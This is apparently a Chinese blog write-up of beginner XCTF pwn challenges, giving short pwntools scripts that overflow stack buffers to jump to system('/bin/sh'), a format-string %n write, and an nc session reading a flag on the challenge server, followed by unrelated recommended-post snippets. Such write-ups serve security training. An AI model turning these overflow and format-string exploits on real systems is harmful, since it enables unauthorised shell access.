XCTF-pwn(一)

于 2025-04-23 02:18:32 发布
阅读量186 收藏 1
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52273419/article/details/147434585
版权

get_shell

文件信息

在这里插入图片描述

在这里插入图片描述

flag

helloctfos@Hello-CTF:~$ nc 61.147.171.105 56505
ls
bin
dev
flag
get_shell
lib
lib32
lib64
cat flag
cyberpeace{be73b6d2c6ef9335f302372399629769}

hello_pwn

文件信息

在这里插入图片描述

在这里插入图片描述

sub_400686

在这里插入图片描述

from pwn import *
p=remote('61.147.171.105','50394')
p.recvuntil("lets get helloworld for bof")
payload=('a'*0x4).encode()+p64(1853186401)
p.sendline(payload)#将payload发送给程序
p.interactive()#进入交互界面8、执行exp,成功拿到攻防世界的flag

level0

文件信息

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

找到了我们需要返回的地方

在这里插入图片描述

生成一段字符串,看一下大小

在这里插入图片描述

在这里插入图片描述

查找一下callsystem函数地址

在这里插入图片描述

payload

from pwn import*

r=remote("61.147.171.105",52218)

payload=b"a"*136+p64(0x400596)

r.sendline(payload)
r.interactive()

level2

文件信息

在这里插入图片描述

buf0x88大小

在这里插入图片描述

system

在这里插入图片描述

/bin/sh

在这里插入图片描述

payload

from pwn import*

r=remote("61.147.171.105",54081)

systemaddr=0x08048320
binshaddr=0x0804A024
payload=b"a"*0x88+b"a"*4+p32(systemaddr)+b"a"*4+p32(binshaddr)

r.sendline(payload)
r.interactive()

CGfsb

文件信息

在这里插入图片描述

pwnme在0804A068

在这里插入图片描述

存在格式化字符串

在这里插入图片描述

确定偏移量为10

在这里插入图片描述

payload

from pwn import*

p=remote("61.147.171.105",55602)


pwnme=0x0804A068
p.recvuntil("please tell me your name:\n")
p.sendline('a')
payload = p32(pwnme)+b'a'*0x4 +b'%10$n'
p.recvuntil("leave your message please:\n")

p.sendline(payload)
p.interactive()
pencek
关注
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 704
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1756
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
攻防世界XCTF-Pwn入门11题解题报告
HUANGXIN9898的博客
07-26 929
Pwn是CTF中至关重要的项目,般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
[XCTF-pwn] 22_format2
weixin_52640415的博客
03-08 269
移栈 个移栈的小题,1:没开pie而且输入的内容放在bss中地址已知,2:程序的correct给了后门,虽然不能直接运行到但可以当后门用,3:auth函数将解码后的input复制到v4,而v4定义是ebp-8当输入大于8里就会溢出到ebp int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp+18h] [ebp-28h] BYREF char s[30]; // [esp+1Eh]
XCTF-pwn-stack2 - Writeup
菜小狗.的博客
11-28 602
偶尔在学习的阶段慢慢发现的进步 抽空写点笔记记录下子 这次做的题目还是栈溢出漏洞的题目但是并没用用到payload,简单用了下ROP 题目描述 除了个名称 stack2 题目描述是:暂无 下载附件运行下看看流程 保护开启了nx 和canary 流程大概是提供了4个选项的功能:加数、改数还有求平均数啥的。 然后丢到iad里看下这部分的流程简单分析下漏洞点。 在这里看还是蛮正常的,...
[XCTF-pwn] 36_xctf-4th-WHCTF-2017_easypwn
weixin_52640415的博客
03-10 420
snprintf的格式化串中途被覆盖也会生效。 unsigned __int64 m1printf() { char s[1024]; // [rsp+10h] [rbp-BF0h] BYREF char v2[1000]; // [rsp+410h] [rbp-7F0h] BYREF char v3[1024]; // [rsp+7F8h] [rbp-408h] BYREF unsigned __int64 v4; // [rsp+BF8h] [rbp-8h] v4 = __re
[XCTF-pwn] 15_厦门邀请赛-pwn
weixin_52640415的博客
03-04 379
同样是写溢出到return的题,这题设置了canary,canary这个机制是把个0+7位随机数放在rbp的前面,如果发现被改动就调用check_stack_fail然后退出。 这个题有循环,只有退出时才会检查,所以在前边可以输入适当长度带出canary在退出前再恢复 from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
XCTF-简单题-pwn-004
Morphy_Amo的博客
12-09 737
CTF-pwn-新手区-004
[XCTF-pwn] 37_xctf-4th-CyberEarth_play
weixin_52640415的博客
03-10 291
又买个,实在是代码太我看不明白了。 解题思路: 用同个用户登录两次,选择不同的攻击方式,直到成功。 成功后,输入名字的地方有溢出,在这里写入rop:泄露,修改got.puts为system,再调用puts(/bin/sh) 验证后的exp: from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_i386/ld-2.23-i386-0ubuntu11.so pw...
XCTF-PWN-level2-WP
l2645470582_的博客
08-02 248
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec 4 3、该文件是32位文件,用32位IDA打开该文件 3.1、shift+f12查看关键字符串 我们看到"/bin/sh"的地址为:x0804A024 3.2、双击关键字符串,按Ctrl+x,再f5进入main函数的反汇编代码 3.3、我们看到关键函数vulnerable_function(),双击进入 3.4、我们看到buf溢出,双击buf查看字符串 buf:0x88...
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 415
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1924
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8675
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行个简单的行业前景分析。 网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
COMSOL中铝水声子晶体能带与流固耦合仿真的关键技术解析
04-23
内容概要:本文详细介绍了使用COMSOL进行铝水声子晶体能带结构和流固耦合仿真的方法和技术细节。首先讨论了材料参数的选择和设置,强调了铝和水的具体参数调整及其重要性。接着阐述了几何建模的方法,如采用二维晶格和蜂窝结构,并提供了具体的建模步骤和代码片段。然后深入探讨了流固耦合边界的处理方式,包括物理场设置、边界条件以及网格划分的注意事项。此外,还讲解了能带计算过程中的些实用技巧,如扫描路径的选择、参数化扫描的应用等。最后,分享了些常见错误及其解决办法,帮助初学者避免常见的陷阱。 适合人群:对声子晶体研究感兴趣的研究人员、研究生以及从事相关领域工作的工程师。 使用场景及目标:适用于希望深入了解COMSOL软件在声子晶体仿真领域的应用,掌握具体操作流程和技术要点的人群。目标是提高使用者对COMSOL的理解,增强其解决复杂工程问题的能力。 其他说明:文中不仅提供了详细的理论指导,还附带了大量的实例代码和实践经验分享,有助于读者更好地理解和应用所学知识。
LabVIEW触摸键盘模块:实现可移植性和源码转出的技术解析
最新发布
04-23
内容概要:本文详细介绍了LabVIEW触摸键盘模块的设计与实现,强调了其在工业控制和手持设备交互中的应用价值。首先阐述了LabVIEW触摸键盘的魅力及其在各种场景中的实用性。接着探讨了如何通过合理的代码结构和资源配置实现键盘模块的高度可移植性,如使用配置文件管理按键参数。然后讲解了源码转出的方法,包括导出为源代码发布以及利用LabVIEW的内置功能进行源码管理和移植。最后深入剖析了触摸键盘的具体代码实现,涵盖事件驱动架构、模块化设计、触摸优化等方面的内容。 适合人群:对LabVIEW编程有定了解,希望深入了解LabVIEW触摸键盘模块设计与实现的工程师和技术爱好者。 使用场景及目标:适用于需要开发定制化输入界面的工业控制系统、自动化测试系统等场景。目标是提高开发效率,增强代码的可移植性和复用性,同时确保良好的用户体验。 其他说明:文中提供了多个具体的代码示例和实践经验,帮助读者更好地理解和应用所介绍的技术方法。此外,还提到了些常见的移植问题及解决方案,有助于避免潜在的技术障碍。
jenkins-2.492.3-1.1
04-23
jenkins-2.492.3-1.1
Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)
04-23
Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档),个人经导师指导并认可通过的高分设计项目,评审分99分,代码完整确保可以运行,小白也可以亲自搞定,主要针对计算机相关专业的正在做大作业的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业,代码资料完整,下载可用。 Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的人脸识别系统 深度学习 (源码+文档)Python毕业设计-基于Python的
BP神经网络信息新陈代谢模型:基于误差逆向传播与数据更新机制的时间序列预测优化
04-23
内容概要:本文详细介绍了如何构建种带有信息新陈代谢机制的BP神经网络模型,用于改进时间序列预测的效果。首先通过Python的Keras库搭建了个基础的BP神经网络,用于预测正弦曲线。接着引入了种数据滚动更新机制,即在每次预测后将最早30%的旧数据替换为最新预测结果,从而保持数据的新鲜度。文中还展示了如何利用滑动窗口技术和适当的代谢系数来提高模型对数据突变的响应速度,并通过实例证明了这种方法的有效性。此外,文章讨论了如何通过调整学习率和添加噪声来进步优化模型性能。 适合人群:具有定编程基础,尤其是熟悉Python和机器学习基础知识的研发人员和技术爱好者。 使用场景及目标:适用于需要处理时间序列数据的场景,如股票预测、能耗分析、电商销量预测等。主要目标是通过引入信息新陈代谢机制,使模型能够更好地适应数据的变化,减少预测误差,提高预测准确性。 其他说明:文中提供了多个代码片段,帮助读者理解和实现相关技术。需要注意的是,虽然该方法在大多数情况下表现良好,但在数据分布发生剧烈变化时仍需人工干预。
实证分析-ESG发展对企业新质生产力影响的研究-来自中国A股上市企业的经验.txt
04-23
因文件较多,数据存放网盘,txt文件内包含下载链接及提取码,永久有效。失效会第时间进行补充。样例数据及详细介绍参见文章:https://blog.csdn.net/samLi0620/article/details/147458849
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值